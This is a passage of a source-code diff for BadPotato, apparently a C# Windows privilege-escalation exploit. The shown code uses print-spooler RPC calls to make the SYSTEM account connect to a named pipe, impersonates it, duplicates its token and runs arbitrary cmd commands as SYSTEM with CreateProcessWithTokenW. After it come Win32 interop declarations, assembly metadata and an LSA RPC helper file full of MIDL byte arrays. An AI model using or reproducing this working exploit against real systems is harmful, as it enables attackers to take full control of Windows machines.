Console.WriteLine(string.Format("[*] {0} Success! err_read:{1} err_write:{2}", "CreateErrReadPipe", err_read, err_write));
}
else
{
Console.WriteLine("[!] CreateErrReadPipe fail!");
}
SetHandleInformation(out_read, 0x00000001, 0);
SetHandleInformation(err_read, 0x00000001, 0);
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
si.cb = Marshal.SizeOf(si);
si.lpDesktop = @"WinSta0\Default";
si.hStdOutput = out_write;
si.hStdError = err_write;
si.dwFlags |= 0x00000100;
string lpApplicationName = Environment.SystemDirectory + "/cmd.exe";
string lpCommandLine = "cmd /c " + args[0];
// bool flag=CreateProcessAsUserW(hSystemTokenDup, null, lpCommandLine, IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, Environment.SystemDirectory, ref si, out pi);
if (CreateProcessWithTokenW(hSystemTokenDup, 0, null, lpCommandLine, 0x08000000, IntPtr.Zero, Environment.CurrentDirectory, ref si, out pi))
{
Console.WriteLine(string.Format("[*] {0} Success! ProcessPid:{1}", "CreateProcessWithTokenW", pi.dwProcessId));
CloseHandle(out_write);
CloseHandle(err_write);
byte[] buf = new byte[4098];
int dwRead = 0;
while (ReadFile(out_read, buf, 4098, ref dwRead, IntPtr.Zero))
{
byte[] outBytes = new byte[dwRead];
Array.Copy(buf, outBytes, dwRead);
Console.WriteLine(System.Text.Encoding.Default.GetString(outBytes));
}
while (ReadFile(err_read, buf, 4098, ref dwRead, IntPtr.Zero))
{
byte[] outBytes = new byte[dwRead];
Array.Copy(buf, outBytes, dwRead);
Console.WriteLine(System.Text.Encoding.Default.GetString(outBytes));
}
CloseHandle(err_read);
CloseHandle(out_read);
CloseHandle(out_write);
CloseHandle(err_write);
CloseHandle(hSystemTokenDup);
CloseHandle(hSystemToken);
CloseHandle(rpcPrinterHandle);
CloseHandle(pipeHandle);
Console.WriteLine("[*] Bye!");
}
else
{
Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
Console.WriteLine("[!] CreateProcessWithTokenW fail!");
}
}
else
{
Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
Console.WriteLine("[!] SetThreadToken fail!");
}
}
else
{
Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
Console.WriteLine("[!] DuplicateTokenEx fail!");
}
}
else
{
Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
Console.WriteLine("[!] OpenThreadToken fail!");
}
}
else
{
Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
Console.WriteLine("[!] ImpersonateNamedPipeClient fail!");
}
}
else
{
CloseHandle(rpcPrinterHandle);
CloseHandle(pipeHandle);
Console.WriteLine("[!] ConnectNamePipe Time Out!");
}
}
else
{
Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
Console.WriteLine("[!] RpcRemoteFindFirstPrinterChangeNotificationEx fail!");
}
}
else
{
CloseHandle(pipeHandle);
Console.WriteLine("[!] RpcOpenPrinter fail!");
}
}
else
{
Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
Console.WriteLine("[!] CreateNamedPipeW fail!") ;
}
}
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool SetThreadToken(IntPtr pHandle, IntPtr hToken);
[SecurityCritical]
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
internal static extern bool CloseHandle(IntPtr handle);
[DllImport("kernel32.dll", EntryPoint = "GetCurrentThread", CallingConvention = CallingConvention.Cdecl)]
public static extern IntPtr GetCurrentThread();
[SecurityCritical]
[DllImport("kernel32.dll", BestFitMapping = false, CharSet = CharSet.Auto, SetLastError = true)]
public static extern IntPtr CreateNamedPipeW(string pipeName, int openMode, int pipeMode, int maxInstances, int outBufferSize, int inBufferSize, int defaultTimeout,ref SECURITY_ATTRIBUTES securityAttributes);
[SecurityCritical]
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool ConnectNamedPipe(IntPtr handle, IntPtr overlapped);
[SecurityCritical]
[DllImport("kernel32.dll", BestFitMapping = false, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool GetNamedPipeHandleState(IntPtr hNamedPipe, IntPtr lpState, IntPtr lpCurInstances, IntPtr lpMaxCollectionCount, IntPtr lpCollectDataTimeout, StringBuilder lpUserName, int nMaxUserNameSize);
[SecurityCritical]
[ReliabilityContract(Consistency.WillNotCorruptState, Cer.MayFail)]
[DllImport("advapi32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool ImpersonateNamedPipeClient(IntPtr hNamedPipe);
[SecurityCritical]
[ReliabilityContract(Consistency.WillNotCorruptState, Cer.MayFail)]
[DllImport("advapi32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool OpenThreadToken(IntPtr ThreadHandle, long DesiredAccess, bool OpenAsSelf,ref IntPtr TokenHandle);
[SecurityCritical]
[ReliabilityContract(Consistency.WillNotCorruptState, Cer.MayFail)]
[DllImport("advapi32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool DuplicateTokenEx(IntPtr hExistingToken,long dwDesiredAccess,int lpTokenAttributes,int ImpersonationLevel,int TokenType,ref IntPtr phNewToken);
[SecurityCritical]
[ReliabilityContract(Consistency.WillNotCorruptState, Cer.MayFail)]
[DllImport("userenv.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool CreateEnvironmentBlock(ref IntPtr lpEnvironment,IntPtr hToken,bool bInherit);
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern bool CreateProcessAsUserW(IntPtr hToken, string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes,bool bInheritHandles, int dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CreatePipe(ref IntPtr hReadPipe,ref IntPtr hWritePipe, ref SECURITY_ATTRIBUTES lpPipeAttributes, Int32 nSize);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool SetHandleInformation(IntPtr hObject, int dwMask, int dwFlags);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool ReadFile(IntPtr hFile, byte[] lpBuffer, int nNumberOfBytesToRead, ref int lpNumberOfBytesRead, IntPtr lpOverlapped/*IntPtr.Zero*/);
[DllImport("advapi32", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern bool CreateProcessWithTokenW(IntPtr hToken, int dwLogonFlags, string lpApplicationName, string lpCommandLine, int dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
}
}

36
Properties/AssemblyInfo.cs Normal file
View File

@ -0,0 +1,36 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// 有关程序集的一般信息由以下
// 控制。更改这些特性值可修改
// 与程序集关联的信息。
[assembly: AssemblyTitle("BadPotato")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("BadPotato")]
[assembly: AssemblyCopyright("Copyright © 2020")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// 将 ComVisible 设置为 false 会使此程序集中的类型
//对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型
//请将此类型的 ComVisible 特性设置为 true。
[assembly: ComVisible(false)]
// 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID
[assembly: Guid("0527a14f-1591-4d94-943e-d6d784a50549")]
// 程序集的版本信息由下列四个值组成:
//
// 主版本
// 次版本
// 生成号
// 修订号
//
//可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值
//通过使用 "*",如下所示:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

520
RPC/lsa.cs Normal file
View File

@ -0,0 +1,520 @@
//
// Copyright (c) Ping Castle. All rights reserved.
// https://www.pingcastle.com
//
// Licensed under the Non-Profit OSL. See LICENSE file in the project root for full license information.
//
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Permissions;
using System.Security.Principal;
using System.Text;
namespace PingCastle.RPC
{
[DebuggerDisplay("{DomainName}")]
public class LSA_DOMAIN_INFORMATION
{
public string DomainName;
public SecurityIdentifier DomainSid;
}
public enum SID_NAME_USE {
SidTypeUser = 1,
SidTypeGroup,
SidTypeDomain,
SidTypeAlias,
SidTypeWellKnownGroup,
SidTypeDeletedAccount,
SidTypeInvalid,
SidTypeUnknown,
SidTypeComputer,
SidTypeLabel
}
[DebuggerDisplay("{DomainName} {TranslatedName}")]
public class LSA_LOOKUP_RESULT
{
public string DomainName;
public SecurityIdentifier DomainSid;
public string TranslatedName;
public SID_NAME_USE Use;
}
public class lsa : rpcapi
{
private static byte[] MIDL_ProcFormatStringx86 = new byte[] {
0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x30,0xe0,0x00,0x00,0x00,0x00,0x38,0x00,0x40,0x00,0x44,0x02,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0x18,0x01,0x00,0x00,0x06,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x01,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x02,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,
0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x03,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x04,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x05,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x06,0x00,0x14,0x00,0x31,0x04,0x00,0x00,0x00,0x5c,0x22,0x00,0x40,0x00,0x46,0x05,0x08,0x05,0x00,0x00,0x01,0x00,
0x00,0x00,0x0a,0x00,0x00,0x00,0x0a,0x00,0x0b,0x01,0x04,0x00,0xc0,0x00,0x48,0x00,0x08,0x00,0x08,0x00,0x10,0x01,0x0c,0x00,0xfa,0x00,0x70,0x00,0x10,0x00,
0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x07,0x00,0x10,0x00,0x30,0x40,0x00,0x00,0x00,0x00,0x2a,0x00,0x08,0x00,0x45,0x04,0x08,0x03,0x01,0x00,0x00,0x00,
0x00,0x00,0x08,0x00,0x00,0x00,0xfe,0x00,0x48,0x00,0x04,0x00,0x0d,0x00,0x13,0x20,0x08,0x00,0x02,0x01,0x70,0x00,0x0c,0x00,0x08,0x00,0x00,0x48,0x00,0x00,
0x00,0x00,0x08,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,
0x09,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0a,0x00,
0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0b,0x00,0x04,0x00,
0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0c,0x00,0x04,0x00,0x32,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0d,0x00,0x04,0x00,0x32,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0e,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0f,0x00,0x1c,0x00,0x30,0x40,0x00,0x00,0x00,0x00,0x46,0x00,
0x24,0x00,0x47,0x07,0x08,0x07,0x01,0x00,0x01,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0xfe,0x00,0x0b,0x01,0x04,0x00,0xf8,0x02,0x13,0x20,0x08,0x00,0x0a,0x03,
0x1b,0x01,0x0c,0x00,0x86,0x03,0x48,0x00,0x10,0x00,0x0d,0x00,0x58,0x01,0x14,0x00,0x08,0x00,0x70,0x00,0x18,0x00,0x08,0x00,0x00
};
private static byte[] MIDL_ProcFormatStringx64 = new byte[] {
0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x30,0xe0,0x00,0x00,0x00,0x00,0x38,0x00,0x40,0x00,0x44,0x02,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x18,0x01,0x00,0x00,0x06,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x01,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x02,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x03,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x04,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x05,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x06,0x00,0x28,0x00,0x31,0x08,0x00,0x00,0x00,0x5c,
0x22,0x00,0x40,0x00,0x46,0x05,0x0a,0x05,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x0a,0x00,0x0b,0x01,0x08,0x00,0xa6,0x00,0x48,0x00,
0x10,0x00,0x08,0x00,0x10,0x01,0x18,0x00,0xcc,0x00,0x70,0x00,0x20,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x07,0x00,0x20,0x00,0x30,0x40,0x00,0x00,
0x00,0x00,0x2a,0x00,0x08,0x00,0x45,0x04,0x0a,0x03,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0xd0,0x00,0x48,0x00,0x08,0x00,0x0d,0x00,
0x13,0x20,0x10,0x00,0xd4,0x00,0x70,0x00,0x18,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x08,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x09,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0a,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0b,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0c,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0d,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0e,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0f,0x00,0x38,0x00,0x30,0x40,0x00,0x00,0x00,0x00,0x46,0x00,
0x24,0x00,0x47,0x07,0x0a,0x07,0x01,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0xd0,0x00,0x0b,0x01,0x08,0x00,0x74,0x02,0x13,0x20,0x10,0x00,
0x88,0x02,0x1b,0x01,0x18,0x00,0x00,0x03,0x48,0x00,0x20,0x00,0x0d,0x00,0x58,0x01,0x28,0x00,0x08,0x00,0x70,0x00,0x30,0x00,0x08,0x00,0x00
};
private static byte[] MIDL_TypeFormatStringx86 = new byte[] {
0x00,0x00,0x11,0x04,0x02,0x00,0x30,0xe1,0x00,0x00,0x12,0x08,0x05,0x5c,0x11,0x00,0xb0,0x00,0x1c,0x00,0x01,0x00,0x17,0x00,0x02,0x00,0x01,0x00,0x17,0x00,
0x00,0x00,0x01,0x00,0x02,0x5b,0x16,0x03,0x08,0x00,0x4b,0x5c,0x46,0x5c,0x04,0x00,0x04,0x00,0x12,0x00,0xe0,0xff,0x5b,0x06,0x06,0x08,0x5c,0x5b,0x1d,0x00,
0x06,0x00,0x01,0x5b,0x15,0x00,0x06,0x00,0x4c,0x00,0xf4,0xff,0x5c,0x5b,0x1b,0x03,0x04,0x00,0x04,0x00,0xf9,0xff,0x01,0x00,0x08,0x5b,0x17,0x03,0x08,0x00,
0xf0,0xff,0x02,0x02,0x4c,0x00,0xe0,0xff,0x5c,0x5b,0x1b,0x00,0x01,0x00,0x00,0x59,0x00,0x00,0x00,0x00,0x02,0x5b,0x17,0x01,0x04,0x00,0xf0,0xff,0x02,0x02,
0x06,0x5b,0x16,0x03,0x14,0x00,0x4b,0x5c,0x46,0x5c,0x04,0x00,0x04,0x00,0x12,0x00,0xce,0xff,0x46,0x5c,0x08,0x00,0x08,0x00,0x12,0x00,0xc4,0xff,0x46,0x5c,
0x0c,0x00,0x0c,0x00,0x12,0x00,0xd4,0xff,0x46,0x5c,0x10,0x00,0x10,0x00,0x12,0x00,0xca,0xff,0x5b,0x02,0x02,0x06,0x08,0x08,0x08,0x08,0x5c,0x5b,0x1a,0x03,
0x0c,0x00,0x00,0x00,0x00,0x00,0x08,0x0d,0x02,0x02,0x3e,0x5b,0x16,0x03,0x18,0x00,0x4b,0x5c,0x46,0x5c,0x04,0x00,0x04,0x00,0x12,0x08,0x02,0x5c,0x46,0x5c,
0x08,0x00,0x08,0x00,0x12,0x00,0x4c,0xff,0x46,0x5c,0x10,0x00,0x10,0x00,0x12,0x00,0x98,0xff,0x46,0x5c,0x14,0x00,0x14,0x00,0x12,0x00,0xc6,0xff,0x5b,0x08,
0x08,0x08,0x08,0x08,0x08,0x5b,0x11,0x04,0x02,0x00,0x30,0xa0,0x00,0x00,0x30,0x41,0x00,0x00,0x11,0x14,0x02,0x00,0x12,0x00,0x02,0x00,0x2b,0x0d,0x26,0x00,
0x04,0x00,0x01,0x00,0x02,0x00,0x30,0x00,0x0d,0x70,0x01,0x00,0x00,0x00,0x52,0x00,0x02,0x00,0x00,0x00,0x7a,0x00,0x03,0x00,0x00,0x00,0x9a,0x00,0x05,0x00,
0x00,0x00,0x94,0x00,0x04,0x00,0x00,0x00,0xae,0x00,0x06,0x00,0x00,0x00,0xbe,0x00,0x07,0x00,0x00,0x00,0xd4,0x00,0x09,0x00,0x00,0x00,0xf0,0x00,0x0a,0x00,
0x00,0x00,0xf8,0x00,0x0b,0x00,0x00,0x00,0xf8,0x00,0x0c,0x00,0x00,0x00,0x1e,0x01,0x0d,0x00,0x00,0x00,0x18,0x01,0x0e,0x00,0x00,0x00,0x5e,0x00,0xff,0xff,
0x15,0x07,0x08,0x00,0x0b,0x5b,0x1a,0x07,0x28,0x00,0x00,0x00,0x00,0x00,0x08,0x08,0x4c,0x00,0xee,0xff,0x02,0x43,0x4c,0x00,0xe8,0xff,0x08,0x40,0x5c,0x5b,
0xb7,0x08,0x00,0x00,0x00,0x00,0xe8,0x03,0x00,0x00,0x1b,0x03,0x04,0x00,0x19,0x00,0x08,0x00,0x00,0x00,0x08,0x5b,0x1a,0x03,0x0c,0x00,0x00,0x00,0x0a,0x00,
0x02,0x3f,0x36,0x4c,0x00,0xdd,0xff,0x5b,0x12,0x00,0xe2,0xff,0x1c,0x01,0x02,0x00,0x17,0x55,0x02,0x00,0x01,0x00,0x17,0x55,0x00,0x00,0x01,0x00,0x05,0x5b,
0x16,0x03,0x0c,0x00,0x4b,0x5c,0x46,0x5c,0x04,0x00,0x04,0x00,0x12,0x00,0xe0,0xff,0x46,0x5c,0x08,0x00,0x08,0x00,0x12,0x00,0x7c,0xfe,0x5b,0x06,0x06,0x08,
0x08,0x5b,0x16,0x03,0x08,0x00,0x4b,0x5c,0x46,0x5c,0x04,0x00,0x04,0x00,0x12,0x00,0xc0,0xff,0x5b,0x06,0x06,0x08,0x5c,0x5b,0x1a,0x01,0x04,0x00,0x00,0x00,
0x00,0x00,0x0d,0x5b,0x1c,0x01,0x02,0x00,0x17,0x55,0x0a,0x00,0x01,0x00,0x17,0x55,0x08,0x00,0x01,0x00,0x05,0x5b,0x16,0x03,0x10,0x00,0x4b,0x5c,0x46,0x5c,
0x04,0x00,0x04,0x00,0x12,0x00,0x8e,0xff,0x46,0x5c,0x0c,0x00,0x0c,0x00,0x12,0x00,0xd6,0xff,0x5b,0x06,0x06,0x08,0x06,0x06,0x08,0x5b,0x15,0x07,0x10,0x00,
0x4c,0x00,0x2c,0xff,0x4c,0x00,0x28,0xff,0x5c,0x5b,0x15,0x00,0x01,0x00,0x02,0x5b,0x15,0x00,0x02,0x00,0x02,0x02,0x5c,0x5b,0x1d,0x00,0x08,0x00,0x01,0x5b,
0x15,0x03,0x10,0x00,0x08,0x06,0x06,0x4c,0x00,0xf1,0xff,0x5b,0x1c,0x01,0x02,0x00,0x17,0x55,0x12,0x00,0x01,0x00,0x17,0x55,0x10,0x00,0x01,0x00,0x05,0x5b,
0x16,0x03,0x2c,0x00,0x4b,0x5c,0x46,0x5c,0x04,0x00,0x04,0x00,0x12,0x00,0x2c,0xff,0x46,0x5c,0x0c,0x00,0x0c,0x00,0x12,0x00,0x74,0xff,0x46,0x5c,0x14,0x00,
0x14,0x00,0x12,0x00,0xcc,0xff,0x46,0x5c,0x28,0x00,0x28,0x00,0x12,0x00,0xb4,0xfd,0x5b,0x06,0x06,0x08,0x06,0x06,0x08,0x06,0x06,0x08,0x4c,0x00,0xa8,0xff,
0x08,0x5b,0x11,0x00,0x42,0x00,0xb7,0x08,0x00,0x00,0x00,0x00,0x00,0x50,0x00,0x00,0x16,0x03,0x04,0x00,0x4b,0x5c,0x46,0x5c,0x00,0x00,0x00,0x00,0x12,0x00,
0x86,0xfd,0x5b,0x08,0x5c,0x5b,0x1b,0x03,0x04,0x00,0x19,0x00,0x00,0x00,0x01,0x00,0x4b,0x5c,0x48,0x49,0x04,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,
0x12,0x00,0x66,0xfd,0x5b,0x4c,0x00,0xcd,0xff,0x5b,0x1a,0x03,0x08,0x00,0x00,0x00,0x08,0x00,0x4c,0x00,0xb6,0xff,0x36,0x5b,0x12,0x00,0xce,0xff,0x11,0x14,
0x02,0x00,0x12,0x00,0x2c,0x00,0x1b,0x03,0x0c,0x00,0x19,0x00,0x00,0x00,0x01,0x00,0x4b,0x5c,0x48,0x49,0x0c,0x00,0x00,0x00,0x02,0x00,0x04,0x00,0x04,0x00,
0x12,0x00,0x84,0xfe,0x08,0x00,0x08,0x00,0x12,0x00,0x22,0xfd,0x5b,0x4c,0x00,0x89,0xfe,0x5b,0x16,0x03,0x0c,0x00,0x4b,0x5c,0x46,0x5c,0x04,0x00,0x04,0x00,
0x12,0x00,0xc8,0xff,0x5b,0x08,0x08,0x08,0x5c,0x5b,0x11,0x00,0x32,0x00,0xb7,0x08,0x00,0x00,0x00,0x00,0x00,0x50,0x00,0x00,0x1a,0x03,0x10,0x00,0x00,0x00,
0x00,0x00,0x0d,0x4c,0x00,0x77,0xfe,0x08,0x5c,0x5b,0x21,0x03,0x00,0x00,0x19,0x00,0x00,0x00,0x01,0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x4c,0x00,0xde,0xff,
0x5c,0x5b,0x1a,0x03,0x08,0x00,0x00,0x00,0x08,0x00,0x4c,0x00,0xc6,0xff,0x36,0x5b,0x12,0x00,0xda,0xff,0x11,0x08,0x08,0x5c,0x00
};
private static byte[] MIDL_TypeFormatStringx64 = new byte[] {
0x00,0x00,0x11,0x04,0x02,0x00,0x30,0xe1,0x00,0x00,0x12,0x08,0x05,0x5c,0x11,0x00,0x96,0x00,0x1c,0x00,0x01,0x00,0x17,0x00,0x02,0x00,0x01,0x00,0x17,0x00,
0x00,0x00,0x01,0x00,0x02,0x5b,0x1a,0x03,0x10,0x00,0x00,0x00,0x08,0x00,0x06,0x06,0x40,0x36,0x5c,0x5b,0x12,0x00,0xde,0xff,0x1d,0x00,0x06,0x00,0x01,0x5b,
0x15,0x00,0x06,0x00,0x4c,0x00,0xf4,0xff,0x5c,0x5b,0x1b,0x03,0x04,0x00,0x04,0x00,0xf9,0xff,0x01,0x00,0x08,0x5b,0x17,0x03,0x08,0x00,0xf0,0xff,0x02,0x02,
0x4c,0x00,0xe0,0xff,0x5c,0x5b,0x1b,0x00,0x01,0x00,0x00,0x59,0x00,0x00,0x00,0x00,0x02,0x5b,0x17,0x01,0x04,0x00,0xf0,0xff,0x02,0x02,0x06,0x5b,0x1a,0x03,
0x28,0x00,0x00,0x00,0x0c,0x00,0x02,0x02,0x06,0x40,0x36,0x36,0x36,0x36,0x5c,0x5b,0x12,0x00,0xc8,0xff,0x12,0x00,0xc4,0xff,0x12,0x00,0xda,0xff,0x12,0x00,
0xd6,0xff,0x1a,0x03,0x0c,0x00,0x00,0x00,0x00,0x00,0x08,0x0d,0x02,0x02,0x3e,0x5b,0x1a,0x03,0x30,0x00,0x00,0x00,0x0c,0x00,0x08,0x40,0x36,0x36,0x08,0x40,
0x36,0x36,0x5c,0x5b,0x12,0x08,0x02,0x5c,0x12,0x00,0x66,0xff,0x12,0x00,0xb4,0xff,0x12,0x00,0xd2,0xff,0x11,0x04,0x02,0x00,0x30,0xa0,0x00,0x00,0x30,0x41,
0x00,0x00,0x11,0x14,0x02,0x00,0x12,0x00,0x02,0x00,0x2b,0x0d,0x26,0x00,0x08,0x00,0x01,0x00,0x02,0x00,0x48,0x00,0x0d,0x70,0x01,0x00,0x00,0x00,0x52,0x00,
0x02,0x00,0x00,0x00,0x7a,0x00,0x03,0x00,0x00,0x00,0xae,0x00,0x05,0x00,0x00,0x00,0xba,0x00,0x04,0x00,0x00,0x00,0xc6,0x00,0x06,0x00,0x00,0x00,0xce,0x00,
0x07,0x00,0x00,0x00,0xd2,0x00,0x09,0x00,0x00,0x00,0xde,0x00,0x0a,0x00,0x00,0x00,0xe6,0x00,0x0b,0x00,0x00,0x00,0xe6,0x00,0x0c,0x00,0x00,0x00,0xfa,0x00,
0x0d,0x00,0x00,0x00,0xf4,0x00,0x0e,0x00,0x00,0x00,0x84,0x00,0xff,0xff,0x15,0x07,0x08,0x00,0x0b,0x5b,0x1a,0x07,0x28,0x00,0x00,0x00,0x00,0x00,0x08,0x08,
